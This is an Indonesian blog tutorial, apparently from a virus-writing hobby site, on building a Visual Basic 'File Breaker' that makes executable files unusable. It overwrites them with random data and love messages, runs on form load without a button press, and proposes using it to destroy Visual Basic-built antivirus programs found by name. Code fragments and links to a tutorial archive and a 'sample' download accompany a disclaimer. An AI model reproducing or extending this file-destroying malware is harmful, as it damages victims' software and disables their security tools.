toxic

the orbit exact intelegent connector

Virus File Breaker

Sudah baca buku seni pemrograman aplikasi Xtreme coding menggunakan Visual basic oleh A.M. HIRIN ? Kalo sudah pasti tau dong Program File Breaker dan apa funsinya? (duh kalimatnya kok hampir sama kaya yang kemarin??) lanjut aja banyak virus yang merusak data salah satunya adalah merusak data aplikasi sehingga data aplikasi tersebut tidak dapat digunakan lagi. Biasanya data aplikasi yang telah dirusak oleh virus icon aslinya akan berubah menjadi icon kotak dengan garis biru tipis diatasnya.

Mengapa para VM menggunakan teknik ini?banyak VM yang beranggapan bahwa berfungsinya program-program bawaan windows akan mengancam kehidupan peliharaannya, maka dari itu perlunya modify pada data aplikasi bawaan windows baik berupa rename ekstensi menjadi file dengan bentuk lain ataupun dengan merusak progam aplikasi tersebut.


Lalu apa kaitannya dengan buku yang saya sebutkan di awal? Jelas ada kaitannya, disini saya akan mengembangkan project dari mas HIRIN, hehehe lagi-lagi boleh yah mas….? Tunggu project itu fungsinya apaan? Fungsinya adalah untuk memodifikasi sedikit data aplikasi dengan memasukkan algoritma yang tidak teratur. Loh kok ga teratur? Berarti data aplikasinya ga bisa digunakan dong? Yup bener banget! Wah lagi-lagi jangan-jangan mau dikembangkan jadi virus lg nih? Hehehe....ga kok ga salah lg maksudnya J tapi ga segitunya lg kok.Next…apa yang kita butuhkan? Logika? Sedikit teknik? Dan sedikit cemilan kali J lihat project tersebut:


Lihat logika alur jalannya program, ternyata program berjalan setelah kita menentukan dimana alamat file .exe yang akan kita rubah, lalu kita mengeksekusi/ menginject code dengan menekan tombol modify? Lalu apa yang harus dilakukan? ? Tolol masi tanya aja ya dibuat pengalamatan langsung, Ga Usah Nulis-nulis Gitu? Gimana caranya biar alamatnya bisa kedaftar sendiri? Wah tanya mulu lo dengerin dulu lihat object apa aja yang di pakai,yang perlu dicermati Textbox = Text1 nah disini kita perlu mendifinisikan/ mendaftarkan alamatnya

Text1.Text = " D:\Bokep.exe "


Wah apa harus gitu? Ga juga,klik aja textbox-nya lalu cari bagian properties –alphabethic-text isi dengan alamat tersebut,hasilnya sama aja kok. Trus gimana biar ga pencet tombol? Ya dibuat load langsung bisa dengan timer atau dengan Private Sub Form_Load.


Lalu panggil sub acak yang berfungsi meng-injectsi/memasukkan data acak sehingga aplikasi tersebut menjadi rusak dan tidak dapat digunakan lagi.


Call acak


Lalu injeksi/masuukan lagi pesan rahasia ke dalam tubuh aplikasi yang telah rusak tersebut agar aplikasi mempunyai beban (baca:memiliki size)


Open Text1.Text For Output As 2


Write #2, "Sayang Kapan Kamu Kembali ke Indonesia?"


Write #2, "Apa Kamu kembali dengan Hatimu yang dulu?"


Close #2



Tp Kok Cuma satu? Aku kan pengennya banyak file yang aku rubah…wu…masak harus aku ajarin? Kan kemarin udah q ajarin kembangin sendiri yah

Sebenarnya seperti kata mas Hirin kalo mau rusak merusak tinggal pakai perintah delete sudah beres, Tapi itu gak jantan katanya, klo aku menyebutnya gada seninya hehehe J . Sebenarnya semua itu berkebalikan ada baik ada buruk begitu pula injects ini. File aplikasi di inject dengan algoritma acak akan menjadi file aplikasi yang rusak, sebaliknya kita dapat mengembalikan file aplikasi yang rusak tersebut dengan meng-inject algoritma kebalikan dari algoritma acak tersebut. Tanya gimana? Yah..anda pasti lebih bisa dari pada saya hehehe…

Sebagai catatan saja Source perusak file ini hanya bisa digunakan pada aplikasi tertentu terutama hasil build-an VisualBasic karena sudah saya coba untuk merusak file regedit.exe computer saya ternyata tidak berhasil walau begitu source ini bisa digunakan untuk melawan AV (Anti virus)build-an VB,yah dengan mendaftarkan nama-nama anti virus build-an VB lalu saat nama tersebut ditemukan lakukan perusakan file.

Sekali lagi saya ingatkan Segala bentuk penyalahgunaan dalam tutorial ini hanyalah untuk pembelajaran, penulis tidak bertanggung jawab atas kerusakan akibat dari perbuatan anda sendiri.



download tutorial

http://www.kitaupload.com/download.php?file=943VirusFileBreaker.rar



download sample:


http://www.kitaupload.com/download.php?file=339SexyAbis.rar